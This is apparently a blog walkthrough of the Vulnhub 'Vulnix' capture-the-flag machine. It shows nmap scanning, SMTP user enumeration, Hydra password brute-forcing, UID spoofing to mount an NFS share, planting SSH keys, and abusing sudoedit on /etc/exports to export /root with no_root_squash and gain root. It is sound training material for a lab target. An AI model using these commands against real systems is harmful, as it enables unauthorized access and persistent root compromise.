Vulnhub Vulnix

Vulnhub

Vulnix

Another day another machine. Let’s send our nmap scan.

nmap -A -sC -sS -T 4 -p- -PN 
Starting Nmap 7.40 ( https://nmap.org ) at 2017-05-23 10:36 EDT
Nmap scan report for vulnix (192.168.1.114)
Host is up (0.00037s latency).
Not shown: 65518 closed ports
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 10💿9e:a0:e4:e0:30:24:3e:bd:67:5f:75:4a:33:bf (DSA)
|   2048 bc:f9:24:07:2f:cb:76:80:0d:27:a6:48:52:0a:24:3a (RSA)
|_  256 4d:bb:4a:c1:18:e8:da:d1:82:6f:58:52:9c:ee:34:5f (ECDSA)
25/tcp    open  smtp       Postfix smtpd
|_smtp-commands: vulnix, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
| ssl-cert: Subject: commonName=vulnix
| Not valid before: 2012-09-02T17:40:12
|_Not valid after:  2022-08-31T17:40:12
|_ssl-date: 2017-05-24T00:59:38+00:00; +10h21m21s from scanner time.
79/tcp    open  finger     Linux fingerd
|_finger: No one logged on.\x0D
110/tcp   open  pop3       Dovecot pop3d
|_pop3-capabilities: SASL STLS CAPA PIPELINING UIDL TOP RESP-CODES
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server
| Not valid before: 2012-09-02T17:40:22
|_Not valid after:  2022-09-02T17:40:22
|_ssl-date: 2017-05-24T00:59:37+00:00; +10h21m22s from scanner time.
111/tcp   open  rpcbind    2-4 (RPC #100000)
|
143/tcp   open  imap       Dovecot imapd
|_imap-capabilities: have SASL-IR IMAP4rev1 more ID LOGIN-REFERRALS LITERAL+ IDLE post-login listed capabilities Pre-login OK LOGINDISABLEDA0001 STARTTLS ENABLE
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server
| Not valid before: 2012-09-02T17:40:22
|_Not valid after:  2022-09-02T17:40:22
|_ssl-date: 2017-05-24T00:59:38+00:00; +10h21m21s from scanner time.
512/tcp   open  exec?
513/tcp   open  login
514/tcp   open  tcpwrapped
993/tcp   open  ssl/imap   Dovecot imapd
|_imap-capabilities: have SASL-IR IMAP4rev1 ID LOGIN-REFERRALS LITERAL+ IDLE more post-login listed capabilities Pre-login AUTH=PLAINA0001 OK ENABLE
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server
| Not valid before: 2012-09-02T17:40:22
|_Not valid after:  2022-09-02T17:40:22
|_ssl-date: 2017-05-24T00:59:38+00:00; +10h21m22s from scanner time.
995/tcp   open  ssl/pop3   Dovecot pop3d
|_pop3-capabilities: SASL(PLAIN) USER CAPA PIPELINING UIDL TOP RESP-CODES
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server
| Not valid before: 2012-09-02T17:40:22
|_Not valid after:  2022-09-02T17:40:22
|_ssl-date: 2017-05-24T00:59:38+00:00; +10h21m22s from scanner time.
2049/tcp  open  nfs_acl    2-3 (RPC #100227)
35665/tcp open  status     1 (RPC #100024)
36639/tcp open  mountd     1-3 (RPC #100005)
36648/tcp open  nlockmgr   1-4 (RPC #100021)
49373/tcp open  mountd     1-3 (RPC #100005)
59566/tcp open  mountd     1-3 (RPC #100005)
MAC Address: 00:0C:29:B8:37:0C (VMware)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10
Network Distance: 1 hop
Service Info: Host:  vulnix; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 10h21m21s, deviation: 0s, median: 10h21m21s

Well we have a lot of stuff going on.

The description of the box mentions that the goal is a misconfiguration of a service instead of an exploit.

I started with enumerating users.

SMTP

Started by connection to the port 25 and seeing that it’s accepting the VRFY command, i’ll try to find the obvious users.

ncat 192.168.1.114 24
220 vulnix ESMTP Postfix (Ubuntu)
VRFY root
252 2.0.0 root
VRFY vulnix
252 2.0.0 vulnix
VRFY something
550 5.1.1 <something>: Recipient address rejected: User unknown in local recipient table

We know for sure that we got at least root and vulnix as users. Since ssh is open, i’ll start a hydra bruteforce with the user vulnix, just in case.

hydra -l vulnix -P ~/git/SecLists/Passwords/500-worst-passwords.txt 192.168.1.114 ssh -t 4

And nothing. Even tried it with a bigger password list.

Another service that peek my interest was nfs.

NFS

After a small google search, i found that a nfs misconfiguration could allow anyone to mount the folder being shared.

To find those folder we need to first find the location of those folders.

showmount -e 192.168.1.114
Export list for 192.168.1.114:
/home/vulnix *

We can se that /home/vulnix is being shared. Let’s mount it.

mount -t nfs 192.168.1.114:/home/vulnix /mnt

drwxr-x---   2 nobody 4294967294 4.0K Sep  2  2012 mnt

The mounting works, but the permissions are not working correctly. I can’t access it. So this doesn’t work, well it half works.

Hydra

So since vulnix password wasn’t bruteforceable, i turned to hydra to find more usernames. I’ll try to enumerate users via smtp and rsh.

hydra -L ~/git/SecLists/Usernames/top_shortlist.txt 192.168.1.114 rsh
Hydra (http://www.thc.org/thc-hydra) starting at 2017-05-23 19:46:14
[DATA] max 11 tasks per 1 server, overall 64 tasks, 11 login tries (l:11/p:1), ~0 tries per task
[DATA] attacking service rsh on port 514
[514][rsh] host: 192.168.1.114   login: user
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2017-05-23 19:46:14

hydra -L ~/git/SecLists/Usernames/top_shortlist.txt 192.168.1.114 stmp-enum
Hydra (http://www.thc.org/thc-hydra) starting at 2017-05-23 19:48:16
[DATA] max 11 tasks per 1 server, overall 64 tasks, 11 login tries (l:11/p:1), ~0 tries per task
[DATA] attacking service smtp-enum on port 25
[25][smtp-enum] host: 192.168.1.114   login: root
[25][smtp-enum] host: 192.168.1.114   login: user
1 of 1 target successfully completed, 2 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2017-05-23 19:48:17

Alright, there’s a user name user. Let’s try to bruteforce him.

hydra -l user -P ~/git/SecLists/Passwords/500-worst-passwords.txt 192.168.1.114 ssh
Hydra (http://www.thc.org/thc-hydra) starting at 2017-05-23 19:50:46
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] max 4 tasks per 1 server, overall 64 tasks, 499 login tries (l:1/p:499), ~1 try per task
[DATA] attacking service ssh on port 22
[22][ssh] host: 192.168.1.114   login: user   password: letmein
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2017-05-23 19:51:02

And that was fast. user:letmein.

Enumeration

We’re in, usually i would have looked at the kernel but this machine is all about misconfigurations. Let’s look at the other services, look for keywords, rsh has to have some .rhosts file and stuff.

So the first thing i decided to look at was the /etc/passwd file, because i know that there’s an nfs share from the user vulnix. I wonder if i create the same user on my kali box with the same id if the mount would work correctly.

The id is 2008

useradd vulnix -u 2008
mount -o nolock -t nfs 192.168.1.114:/home/vulnix /mnt
su vulnix
cd /mnt

ls -lha 
drwxr-x---  2 vulnix vulnix 4.0K May 24  2017 .
drwxr-xr-x 21 root   root   4.0K May 17 23:26 ..
-rw-r--r--  1 vulnix vulnix  220 Apr  3  2012 .bash_logout
-rw-r--r--  1 vulnix vulnix 3.5K Apr  3  2012 .bashrc
-rw-r--r--  1 vulnix vulnix  675 Apr  3  2012 .profile

Well that was underwhelming. There’s nothing good. Oh shit but wait, i could set up my own ssh key to ssh into it without password !

Well shit! I have no space to create stuff on that machine. I guess the logs made the hard drive completely full. I tried deleting stuff but nada!

So i had to reiniatilise the machine. I redownloaded the whole machine and set it up again.

And it worked, man that sucked lost an hour tryout to figure out how to get some free space.

mkdir .ssh
cd .ssh
echo "the public key" > authorized_keys

Vulnix user

So as vulnix user, let’s look at this sudo rights

sudo -l
Matching 'Defaults' entries for vulnix on this host:
    env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User vulnix may run the following commands on this host:
    (root) sudoedit /etc/exports, (root) NOPASSWD: sudoedit /etc/exports

Alright, we can run a command as root. I guess i could share root’s folder and do the same steps that we did with vulnix.

We’ll add the line /root *(rw,no_root_squash) after /home/vulnix.

/home/vulnix    *(rw,root_squash)
/root *(rw,no_root_squash)

We’ll reboot the machine. After that on our kali machine we’ll look for those nfs mounts.

showmount -e 192.168.1.135
Export list for 192.168.1.135:
/root        *
/home/vulnix *

Looks like it worked, let’s mount it.

mount -t nfs -o nolock 192.168.1.135:/root /mnt
cd /mnt
ls -lha
total 28K
drwx------  3 root root 4.0K Sep  2  2012 .
drwxr-xr-x 21 root root 4.0K May 17 23:26 ..
-rw-------  1 root root    0 Sep  2  2012 .bash_history
-rw-r--r--  1 root root 3.1K Apr 19  2012 .bashrc
drwx------  2 root root 4.0K Sep  2  2012 .cache
-rw-r--r--  1 root root  140 Apr 19  2012 .profile
-r--------  1 root root   33 Sep  2  2012 trophy.txt
-rw-------  1 root root  710 Sep  2  2012 .viminfo

cat trophy.txt
cc614640424f5bd60ce5d5264899c3be

mkdir .ssh
cd .ssh
echo "publickeystuff" > authorized_keys

We can now ssh using root

ssh [email protected]

id
uid=0(root) gid=0(root) groups=0(root)